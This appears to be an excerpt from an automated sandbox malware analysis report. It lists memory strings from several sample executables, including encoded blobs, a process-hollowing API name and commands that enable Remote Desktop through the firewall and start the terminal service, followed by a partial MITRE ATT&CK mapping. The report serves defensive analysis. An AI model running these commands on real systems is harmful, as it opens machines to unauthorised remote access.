k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000016.00000000.1887736305.0000000000D01000.00000002.00000001.01000000.00000012.sdmp | String found in binary or memory: net start termservice
                                                Source: Gxtuum.exe, 00000016.00000000.1887736305.0000000000D01000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ 
k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000003.2150116458.0000000004960000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000003.2150116458.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2190924706.0000000000161000.00000040.00000001.01000000.0000001A.sdmp | String found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2190924706.0000000000161000.00000040.00000001.01000000.0000001A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000003.2208833201.0000000004A60000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000003.2208833201.0000000004A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2286174496.0000000000161000.00000040.00000001.01000000.0000001A.sdmp | String found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2286174496.0000000000161000.00000040.00000001.01000000.0000001A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 0_2_00C91204
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_00C91806
MITRE ATT&CK Matrix (Joe Sandbox mapping of matched signatures to tactics and techniques). Each tactic column is listed in its original cell order; the number in parentheses is the count Joe Sandbox shows for that technique, and techniques without one are matrix entries that no signature matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations

Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure

Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain

